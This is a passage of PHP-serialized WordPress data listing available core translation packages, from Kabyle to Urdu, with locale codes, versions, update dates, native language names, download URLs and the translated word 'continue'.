11:40:39\";s:12:\"english_name\";s:6:\"Kabyle\";s:11:\"native_name\";s:9:\"Taqbaylit\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.2.9/kab.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"kab\";i:3;s:3:\"kab\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Kemmel\";}}s:2:\"kk\";a:8:{s:8:\"language\";s:2:\"kk\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2024-07-18 02:49:24\";s:12:\"english_name\";s:6:\"Kazakh\";s:11:\"native_name\";s:19:\"Қазақ тілі\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.9-RC/kk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kk\";i:2;s:3:\"kaz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Жалғастыру\";}}s:2:\"km\";a:8:{s:8:\"language\";s:2:\"km\";s:7:\"version\";s:6:\"5.2.23\";s:7:\"updated\";s:19:\"2019-06-10 16:18:28\";s:12:\"english_name\";s:5:\"Khmer\";s:11:\"native_name\";s:27:\"ភាសាខ្មែរ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.2.23/km.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"km\";i:2;s:3:\"khm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"បន្ត\";}}s:2:\"kn\";a:8:{s:8:\"language\";s:2:\"kn\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-02 11:49:59\";s:12:\"english_name\";s:7:\"Kannada\";s:11:\"native_name\";s:15:\"ಕನ್ನಡ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/kn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kn\";i:2;s:3:\"kan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"ಮುಂದುವರಿಸು\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-26 00:20:52\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:3:\"ckb\";a:8:{s:8:\"language\";s:3:\"ckb\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-24 14:14:21\";s:12:\"english_name\";s:16:\"Kurdish (Sorani)\";s:11:\"native_name\";s:13:\"كوردی‎\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.9.4/ckb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ku\";i:3;s:3:\"ckb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"به‌رده‌وام به‌\";}}s:3:\"kir\";a:8:{s:8:\"language\";s:3:\"kir\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-25 22:55:12\";s:12:\"english_name\";s:6:\"Kyrgyz\";s:11:\"native_name\";s:16:\"Кыргызча\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.9.4/kir.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ky\";i:2;s:3:\"kir\";i:3;s:3:\"kir\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Улантуу\";}}s:2:\"lo\";a:8:{s:8:\"language\";s:2:\"lo\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-23 01:10:05\";s:12:\"english_name\";s:3:\"Lao\";s:11:\"native_name\";s:21:\"ພາສາລາວ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/lo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lo\";i:2;s:3:\"lao\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"ຕໍ່​ໄປ\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2025-09-27 20:51:17\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.9-RC/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:2:\"lv\";a:8:{s:8:\"language\";s:2:\"lv\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-20 20:55:46\";s:12:\"english_name\";s:7:\"Latvian\";s:11:\"native_name\";s:16:\"Latviešu valoda\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/lv.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lv\";i:2;s:3:\"lav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Turpināt\";}}s:5:\"mk_MK\";a:8:{s:8:\"language\";s:5:\"mk_MK\";s:7:\"version\";s:6:\"6.0.11\";s:7:\"updated\";s:19:\"2022-10-01 09:23:52\";s:12:\"english_name\";s:10:\"Macedonian\";s:11:\"native_name\";s:31:\"Македонски јазик\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.0.11/mk_MK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mk\";i:2;s:3:\"mkd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Продолжи\";}}s:5:\"ml_IN\";a:8:{s:8:\"language\";s:5:\"ml_IN\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-23 15:49:12\";s:12:\"english_name\";s:9:\"Malayalam\";s:11:\"native_name\";s:18:\"മലയാളം\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/ml_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ml\";i:2;s:3:\"mal\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"തുടരുക\";}}s:2:\"mn\";a:8:{s:8:\"language\";s:2:\"mn\";s:7:\"version\";s:5:\"6.5.8\";s:7:\"updated\";s:19:\"2024-06-20 17:22:06\";s:12:\"english_name\";s:9:\"Mongolian\";s:11:\"native_name\";s:12:\"Монгол\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.5.8/mn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mn\";i:2;s:3:\"mon\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"mr\";a:8:{s:8:\"language\";s:2:\"mr\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-25 15:07:24\";s:12:\"english_name\";s:7:\"Marathi\";s:11:\"native_name\";s:15:\"मराठी\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/mr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mr\";i:2;s:3:\"mar\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"सुरु ठेवा\";}}s:5:\"ms_MY\";a:8:{s:8:\"language\";s:5:\"ms_MY\";s:7:\"version\";s:6:\"5.5.18\";s:7:\"updated\";s:19:\"2022-03-11 13:52:22\";s:12:\"english_name\";s:5:\"Malay\";s:11:\"native_name\";s:13:\"Bahasa Melayu\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.5.18/ms_MY.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ms\";i:2;s:3:\"msa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Teruskan\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:6:\"4.2.39\";s:7:\"updated\";s:19:\"2017-12-26 11:57:10\";s:12:\"english_name\";s:17:\"Myanmar (Burmese)\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.2.39/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ဆောင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-26 04:23:29\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"ne_NP\";a:8:{s:8:\"language\";s:5:\"ne_NP\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2025-11-07 08:26:32\";s:12:\"english_name\";s:6:\"Nepali\";s:11:\"native_name\";s:18:\"नेपाली\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.9-RC/ne_NP.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ne\";i:2;s:3:\"nep\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:43:\"जारी राख्नुहोस्\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 07:28:56\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:12:\"nl_NL_formal\";a:8:{s:8:\"language\";s:12:\"nl_NL_formal\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 13:02:36\";s:12:\"english_name\";s:14:\"Dutch (Formal)\";s:11:\"native_name\";s:20:\"Nederlands (Formeel)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/6.9.4/nl_NL_formal.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nl_BE\";a:8:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-30 14:22:28\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/nl_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nn_NO\";a:8:{s:8:\"language\";s:5:\"nn_NO\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-18 10:59:16\";s:12:\"english_name\";s:19:\"Norwegian (Nynorsk)\";s:11:\"native_name\";s:13:\"Norsk nynorsk\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/nn_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nn\";i:2;s:3:\"nno\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Hald fram\";}}s:3:\"oci\";a:8:{s:8:\"language\";s:3:\"oci\";s:7:\"version\";s:6:\"4.8.27\";s:7:\"updated\";s:19:\"2017-08-25 10:03:08\";s:12:\"english_name\";s:7:\"Occitan\";s:11:\"native_name\";s:7:\"Occitan\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.27/oci.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"oc\";i:2;s:3:\"oci\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Contunhar\";}}s:5:\"pa_IN\";a:8:{s:8:\"language\";s:5:\"pa_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-16 05:19:43\";s:12:\"english_name\";s:15:\"Panjabi (India)\";s:11:\"native_name\";s:18:\"ਪੰਜਾਬੀ\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/pa_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pa\";i:2;s:3:\"pan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ਜਾਰੀ ਰੱਖੋ\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-04-01 16:43:23\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:2:\"ps\";a:8:{s:8:\"language\";s:2:\"ps\";s:7:\"version\";s:6:\"4.3.35\";s:7:\"updated\";s:19:\"2015-12-02 21:41:29\";s:12:\"english_name\";s:6:\"Pashto\";s:11:\"native_name\";s:8:\"پښتو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.3.35/ps.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ps\";i:2;s:3:\"pus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"دوام ورکړه\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-04 09:12:12\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-29 18:57:17\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_AO\";a:8:{s:8:\"language\";s:5:\"pt_AO\";s:7:\"version\";s:5:\"6.4.8\";s:7:\"updated\";s:19:\"2023-08-21 12:15:00\";s:12:\"english_name\";s:19:\"Portuguese (Angola)\";s:11:\"native_name\";s:20:\"Português de Angola\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.4.8/pt_AO.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:10:\"pt_PT_ao90\";a:8:{s:8:\"language\";s:10:\"pt_PT_ao90\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-04 09:13:24\";s:12:\"english_name\";s:27:\"Portuguese (Portugal, AO90)\";s:11:\"native_name\";s:17:\"Português (AO90)\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/translation/core/6.9.4/pt_PT_ao90.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"rhg\";a:8:{s:8:\"language\";s:3:\"rhg\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-16 13:03:18\";s:12:\"english_name\";s:8:\"Rohingya\";s:11:\"native_name\";s:8:\"Ruáinga\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/rhg.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"rhg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 08:37:00\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 07:09:12\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:3:\"sah\";a:8:{s:8:\"language\";s:3:\"sah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-21 02:06:41\";s:12:\"english_name\";s:5:\"Sakha\";s:11:\"native_name\";s:14:\"Сахалыы\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/sah.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"sah\";i:3;s:3:\"sah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Салҕаа\";}}s:3:\"snd\";a:8:{s:8:\"language\";s:3:\"snd\";s:7:\"version\";s:6:\"5.4.19\";s:7:\"updated\";s:19:\"2020-07-07 01:53:37\";s:12:\"english_name\";s:6:\"Sindhi\";s:11:\"native_name\";s:8:\"سنڌي\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/5.4.19/snd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"sd\";i:2;s:3:\"snd\";i:3;s:3:\"snd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"اڳتي هلو\";}}s:5:\"si_LK\";a:8:{s:8:\"language\";s:5:\"si_LK\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 06:00:52\";s:12:\"english_name\";s:7:\"Sinhala\";s:11:\"native_name\";s:15:\"සිංහල\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/si_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"si\";i:2;s:3:\"sin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:44:\"දිගටම කරගෙන යන්න\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-25 08:52:18\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:3:\"skr\";a:8:{s:8:\"language\";s:3:\"skr\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2025-04-24 16:58:02\";s:12:\"english_name\";s:7:\"Saraiki\";s:11:\"native_name\";s:14:\"سرائیکی\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/6.9-RC/skr.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"skr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"جاری رکھو\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2025-10-29 11:19:02\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Nadaljuj\";}}s:2:\"sq\";a:8:{s:8:\"language\";s:2:\"sq\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-14 20:39:21\";s:12:\"english_name\";s:8:\"Albanian\";s:11:\"native_name\";s:5:\"Shqip\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/sq.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sq\";i:2;s:3:\"sqi\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Vazhdo\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2025-12-03 15:37:44\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 08:26:35\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:2:\"sw\";a:8:{s:8:\"language\";s:2:\"sw\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-21 11:17:30\";s:12:\"english_name\";s:7:\"Swahili\";s:11:\"native_name\";s:9:\"Kiswahili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/sw.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sw\";i:2;s:3:\"swa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Endelea\";}}s:3:\"szl\";a:8:{s:8:\"language\";s:3:\"szl\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-24 19:58:14\";s:12:\"english_name\";s:8:\"Silesian\";s:11:\"native_name\";s:17:\"Ślōnskŏ gŏdka\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/szl.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"szl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:13:\"Kōntynuować\";}}s:5:\"ta_IN\";a:8:{s:8:\"language\";s:5:\"ta_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:22:47\";s:12:\"english_name\";s:5:\"Tamil\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ta_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"தொடரவும்\";}}s:5:\"ta_LK\";a:8:{s:8:\"language\";s:5:\"ta_LK\";s:7:\"version\";s:6:\"4.2.39\";s:7:\"updated\";s:19:\"2015-12-03 01:07:44\";s:12:\"english_name\";s:17:\"Tamil (Sri Lanka)\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.2.39/ta_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"தொடர்க\";}}s:2:\"te\";a:8:{s:8:\"language\";s:2:\"te\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:47:39\";s:12:\"english_name\";s:6:\"Telugu\";s:11:\"native_name\";s:18:\"తెలుగు\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/te.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"te\";i:2;s:3:\"tel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"కొనసాగించు\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:6:\"5.8.13\";s:7:\"updated\";s:19:\"2022-06-08 04:30:30\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.8.13/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:2:\"tl\";a:8:{s:8:\"language\";s:2:\"tl\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-26 04:01:56\";s:12:\"english_name\";s:7:\"Tagalog\";s:11:\"native_name\";s:7:\"Tagalog\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/tl.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tl\";i:2;s:3:\"tgl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Magpatuloy\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-27 23:26:16\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"tt_RU\";a:8:{s:8:\"language\";s:5:\"tt_RU\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-20 20:20:50\";s:12:\"english_name\";s:5:\"Tatar\";s:11:\"native_name\";s:19:\"Татар теле\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/tt_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tt\";i:2;s:3:\"tat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"дәвам итү\";}}s:3:\"tah\";a:8:{s:8:\"language\";s:3:\"tah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-06 18:39:39\";s:12:\"english_name\";s:8:\"Tahitian\";s:11:\"native_name\";s:10:\"Reo Tahiti\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/tah.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ty\";i:2;s:3:\"tah\";i:3;s:3:\"tah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ug_CN\";a:8:{s:8:\"language\";s:5:\"ug_CN\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-01-29 23:09:01\";s:12:\"english_name\";s:6:\"Uighur\";s:11:\"native_name\";s:16:\"ئۇيغۇرچە\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/ug_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ug\";i:2;s:3:\"uig\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:26:\"داۋاملاشتۇرۇش\";}}s:2:\"uk\";a:8:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:3:\"6.8\";s:7:\"updated\";s:19:\"2025-04-18 21:10:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.8/uk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uk\";i:2;s:3:\"ukr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продовжити\";}}s:2:\"ur\";a:8:{s:8:\"language\";s:2:\"ur\";s:7:\"version\";s:6:\"5.4.19\";s:7:\"updated\";s:19:\"2020-04-09 11:17:33\";s:12:\"english_name\";s:4:\"Urdu\";s:11:\"native_name\";s:8:\"اردو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.4.19/ur.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ur\";i:2;s:3:\"urd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"جاری 